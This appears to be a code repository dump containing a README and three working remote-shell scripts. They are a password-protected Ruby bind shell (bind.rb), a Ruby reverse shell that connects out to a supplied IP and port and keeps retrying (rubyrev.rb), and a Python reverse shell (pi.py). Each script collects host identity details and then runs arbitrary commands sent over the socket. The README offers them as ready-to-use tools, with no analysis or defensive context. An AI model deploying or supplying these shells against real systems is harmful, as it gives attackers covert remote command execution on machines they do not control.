├── README.md ├── bind.rb ├── pi.py └── rubyrev.rb /README.md: -------------------------------------------------------------------------------- 1 | Ruby-Bind-and-Reverse-Shells 2 | ============================ 3 | 4 | Ruby Bind and Reverse Shells I wrote using standard libs. Bind Shell includes authentication while reverse does not. Standard libs only so should work in most places you find Ruby supported. Hope its helpsful to someone..... 5 | -------------------------------------------------------------------------------- /bind.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # Ruby Bind Shell 3 | # By: Hood3dRob1n 4 | # 5 | # ./bind.rb PORT (PASS) 6 | # 7 | require 'socket' 8 | require 'open3' 9 | 10 | #Add some color without colorize gem since we sticking to std libs :) 11 | RS="\033[0m" # reset 12 | HC="\033[1m" # hicolor 13 | FRED="\033[31m" # foreground red 14 | FGRN="\033[32m" # foreground green 15 | FWHT="\033[37m" # foreground white 16 | 17 | def cls #A quick method to clear the whole terminal 18 | if RUBY_PLATFORM =~ /win32/ 19 | system('cls') 20 | else 21 | system('clear') 22 | end 23 | end 24 | 25 | def randz 26 | (0...1).map{ ('0'..'3').to_a[rand(4)] }.join 27 | end 28 | 29 | def help(message) #Exit strategy when shit goes sideways 30 | cls 31 | puts 32 | puts "#{message}" #print message passed when called 33 | #print example of usage sicne they obviously dont understand how this simple script works :p 34 | puts "#{HC}#{FGRN}EX#{FWHT}: #{$0} PORT #{FRED}(#{FWHT}PASS#{FRED})#{RS}" 35 | puts "#{HC}#{FGRN}\t=> #{FWHT}Default Pass is '#{FGRN}knock-knock#{FWHT}' if none is provided#{RS}" 36 | puts 37 | exit 666; 38 | end 39 | 40 | def bindshell 41 | #The number over loop is the port number the shell listens on. 42 | Socket.tcp_server_loop("#{PORT}") do |socket, client_addrinfo| 43 | command = socket.gets.chomp 44 | if command.downcase == "#{PASS}" 45 | socket.puts "\n#{HC}#{FGRN}You've Been Authenticated#{FWHT}!#{RS}\n" 46 | socket.puts "#{HC}#{FGRN}This Bind connection brought to you by a little Ruby Magic#{FWHT} xD#{RS}\n" 47 | socket.puts "#{HC}#{FGRN}Type #{FWHT}EXIT#{FGRN} or #{FWHT}QUIT#{FGRN} to temporarily leave shell & keep port open listening#{FWHT}...#{RS}" 48 | socket.puts "#{HC}#{FGRN}Type #{FWHT}KILLZ#{FGRN} or #{FWHT}CLOSE#{FGRN} to close port & shell for good#{FWHT}!\n#{RS}" 49 | socket.puts "#{HC}#{FGRN}Server Info#{FWHT}:#{RS}" 50 | begin 51 | count=0 52 | if RUBY_PLATFORM =~ /win32/ #First we scrape some basic info based on platform type.... 53 | while count.to_i < 3 54 | if count.to_i == 0 55 | command="whoami" 56 | socket.print "#{HC}#{FGRN}ID#{FWHT}: #{RS}" 57 | elsif count.to_i == 1 58 | command="chdir" 59 | socket.print "#{HC}#{FGRN}PWD#{FWHT}: #{RS}" 60 | elsif count.to_i == 2 61 | command="echo Winblows" 62 | socket.print "#{HC}#{FGRN}BUILD#{FWHT}: #{RS}\n" 63 | end 64 | count += 1 65 | Open3.popen2e("#{command}") do | stdin, stdothers | 66 | IO.copy_stream(stdothers, socket) 67 | end 68 | end 69 | else 70 | while count.to_i < 3 71 | if count.to_i == 0 72 | command="id" 73 | socket.print "#{HC}#{FGRN}ID#{FWHT}: #{RS}" 74 | elsif count.to_i == 1 75 | command="pwd" 76 | socket.print "#{HC}#{FGRN}PWD#{FWHT}: #{RS}" 77 | elsif count.to_i == 2 78 | command="uname -a" 79 | socket.print "#{HC}#{FGRN}BUILD#{FWHT}: #{RS}\n" 80 | end 81 | count += 1 82 | Open3.popen2e("#{command}") do | stdin, stdothers | 83 | IO.copy_stream(stdothers, socket) 84 | end 85 | end 86 | end 87 | #Then we drop to sudo shell :) 88 | @work=Dir.pwd #var for keeping a working path so 'cd' works (for the most part) 89 | while(true) 90 | socket.print "\n#{HC}#{FWHT}(#{FGRN}GreenShell#{FWHT})#{FGRN}>#{RS}" 91 | command = socket.gets.chomp 92 | if command.downcase == 'exit' or command.downcase == 'quit' 93 | socket.puts "\n#{HC}#{FGRN}got r00t#{FWHT}?#{RS}\n\n" 94 | break #Exit when asked nicely :p 95 | end 96 | if command.downcase == 'killz' or command.downcase == 'close' 97 | socket.puts "\n#{HC}#{FGRN}got r00t#{FWHT}?#{RS}\n\n" 98 | exit #Exit when asked nicely :p 99 | end 100 | if command.downcase =~ /cd (.+)/i #our mini block to handle change directory requests 101 | Dir.chdir("#{$1}") do |dir| 102 | @work = Dir.pwd 103 | end 104 | end 105 | #Use open3 to execute commands as we read and write through socket connection 106 | Open3.popen2e("cd #{@work} && #{command}") do | stdin, stdothers | 107 | IO.copy_stream(stdothers, socket) 108 | end 109 | end 110 | rescue 111 | socket.write "#{HC}#{FRED}Command or file not found#{FWHT}!\n#{RS}" 112 | socket.write "#{HC}#{FRED}Type #{FWHT}EXIT#{FRED} or #{FWHT}QUIT#{FRED} to exit the shell#{FWHT}.\n#{RS}" 113 | socket.write "#{HC}#{FRED}Type #{FWHT}KILL#{FRED} or #{FWHT}CLOSE#{FRED} to kill the shell completely#{FWHT}.\n#{RS}" 114 | socket.write "\n\n" 115 | retry 116 | ensure 117 | @cleared=0 118 | socket.close 119 | end 120 | else 121 | num=randz 122 | socket.puts @greetz[num.to_i] 123 | end 124 | end 125 | end 126 | 127 | PORT = ARGV[0] || help("#{HC}#{FRED}Please re-run script with necessary options provided as argument(s)#{FWHT}!#{RS}") #confirm argument passed 128 | PASS = ARGV[1] || "knock-knock" ### THIS IS PASSWORD TO ENTER UPON CONNECTION, PASS as ARGUMENT AFTER PORT OR HARD-CODE IT HERE ### 129 | trap("SIGINT") {puts "\n\n#{HC}#{FRED}WARNING! CTRL+C Detected closing Socket Port#{FWHT}.....#{RS}"; exit 666;} 130 | @greetz=["#{HC}#{FGRN}Piss Off#{FWHT}!#{RS}", "#{HC}#{FGRN}Grumble, Grumble#{FWHT}......#{FGRN}?#{RS}", "#{HC}#{FGRN}Run along now, nothing to see here#{FWHT}.....#{RS}", "#{HC}#{FGRN}Who's There#{FWHT}?#{RS}"] 131 | bindshell 132 | -------------------------------------------------------------------------------- /pi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # A reverse shell in Python written by my friend Pi 3 | # Because i think its cool :p 4 | 5 | import os, socket, sys 6 | 7 | #Provide geenral usage statement fo rnewbies 8 | def usage(): 9 | print ''' 10 | +----------------------------+ 11 | | scriptname.py IP PORT | 12 | |--------e-x-a-m-p-l-e-------| 13 | | script.py 192.168.1.2 9999 | 14 | +----------------------------+''',exit() 15 | 16 | #Put down an interupt catcher 17 | def signalHandler(signal, frame): 18 | print("[!] CTRL+C received [!] shutting down now..."); 19 | sys.exit() 20 | 21 | 22 | if len(sys.argv) < 3:usage() 23 | 24 | #Establish our throw back using IP and PORT passed at run time 25 | s=socket.socket() 26 | s.connect((sys.argv[1],int(sys.argv[2]))) 27 | #Print pretty banner upon connect in 28 | 29 | s.send(''' 30 | __ 31 | ___ ___ _ _ ___ | | 32 | ___| | | |_ ___ _| | |_ _ _ ___| | 33 | | _| | | | | _|___| . | | | | | | |__| 34 | |_| |___|___|_| |___|___|_____|_|_|__| 35 | 36 | A Python Reverse Shell By: Pi 37 | 38 | 39 | Type "exit" to exit the shell\n[r00t-d0wn]cmd>''') 40 | 41 | while 1: 42 | data = s.recv(512) 43 | if data.lower()=="q": 44 | s.close() 45 | break; 46 | else: 47 | if data.startswith('exit'): 48 | s.close() 49 | break; 50 | else: 51 | result=os.popen(data).read() 52 | if (data.lower() != "q"): 53 | s.send(str(result)+"[r00t-d0wn]cmd>") 54 | else: 55 | s.send(str(result)) 56 | s.close() 57 | break; 58 | exit() 59 | -------------------------------------------------------------------------------- /rubyrev.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # Ruby Reverse Shell 3 | # By: Hood3dRob1n 4 | # 5 | # ./rubyrev.rb IP PORT 6 | # 7 | 8 | require 'socket' 9 | require 'open3' 10 | 11 | #Add some color without colorize gem since we sticking to std libs :) 12 | RS="\033[0m" # reset 13 | HC="\033[1m" # hicolor 14 | FRED="\033[31m" # foreground red 15 | FGRN="\033[32m" # foreground green 16 | FWHT="\033[37m" # foreground white 17 | 18 | trap("SIGINT") {puts "\n\n#{HC}#{FRED}WARNING! CTRL+C Detected closing Socket connection#{FWHT}.....#{RS}"; exit 666;} 19 | 20 | begin 21 | socket = TCPSocket.new "#{ARGV[0]}", "#{ARGV[1]}" #establish socket connection object using provided IP & PORT 22 | rescue 23 | #If we fail to connect, wait a few and try again or user cancles shit 24 | sleep 10 25 | retry 26 | end 27 | 28 | #Runs the commands you type and sends you back the stdout and stderr. 29 | #Shell Action... 30 | begin 31 | socket.puts "#{HC}#{FGRN}This Reverse connection brought to you by a little Ruby Magic#{FWHT} xD#{RS}\n\n" 32 | socket.puts "#{HC}#{FGRN}Server Info#{FWHT}:#{RS}" 33 | count=0 34 | #First we scrape some basic info.... 35 | if RUBY_PLATFORM =~ /win32/ 36 | while count.to_i < 3 37 | if count.to_i == 0 38 | command="whoami" 39 | socket.print "#{HC}#{FGRN}ID#{FWHT}: #{RS}" 40 | elsif count.to_i == 1 41 | command="chdir" 42 | socket.print "#{HC}#{FGRN}PWD#{FWHT}: #{RS}" 43 | elsif count.to_i == 2 44 | command="echo Winblows" 45 | socket.print "#{HC}#{FGRN}BUILD#{FWHT}: #{RS}\n" 46 | end 47 | count += 1 48 | #Use open3 to execute commands as we read and write through socket connection 49 | Open3.popen2e("#{command}") do | stdin, stdothers | 50 | IO.copy_stream(stdothers, socket) 51 | end 52 | end 53 | else 54 | while count.to_i < 3 55 | if count.to_i == 0 56 | command="id" 57 | socket.print "#{HC}#{FGRN}ID#{FWHT}: #{RS}" 58 | elsif count.to_i == 1 59 | command="pwd" 60 | socket.print "#{HC}#{FGRN}PWD#{FWHT}: #{RS}" 61 | elsif count.to_i == 2 62 | command="uname -a" 63 | socket.print "#{HC}#{FGRN}BUILD#{FWHT}: #{RS}\n" 64 | end 65 | count += 1 66 | #Use open3 to execute commands as we read and write through socket connection 67 | Open3.popen2e("#{command}") do | stdin, stdothers | 68 | IO.copy_stream(stdothers, socket) 69 | end 70 | end 71 | end 72 | #Then we drop to sudo shell :) 73 | @work=Dir.pwd #var for keeping a working path so 'cd' works (for the most part) 74 | while(true) 75 | socket.print "\n#{HC}#{FWHT}(#{FGRN}GreenShell#{FWHT})#{FGRN}>#{RS}" 76 | command = socket.gets.chomp 77 | if command.downcase == 'exit' or command.downcase == 'quit' 78 | socket.puts "\n#{HC}#{FGRN}got r00t#{FWHT}?#{RS}\n\n" 79 | break #Exit when asked nicely :p 80 | end 81 | if command.downcase =~ /cd (.+)/i #our mini block to handle change directory requests 82 | Dir.chdir("#{$1}") do |dir| 83 | @work = Dir.pwd 84 | end 85 | end 86 | #Use open3 to execute commands as we read and write through socket connection 87 | Open3.popen2e("cd #{@work} && #{command}") do | stdin, stdothers | 88 | IO.copy_stream(stdothers, socket) 89 | end 90 | end 91 | rescue 92 | #If we fail for some reason, try again 93 | retry 94 | end 95 | #EOF 96 | --------------------------------------------------------------------------------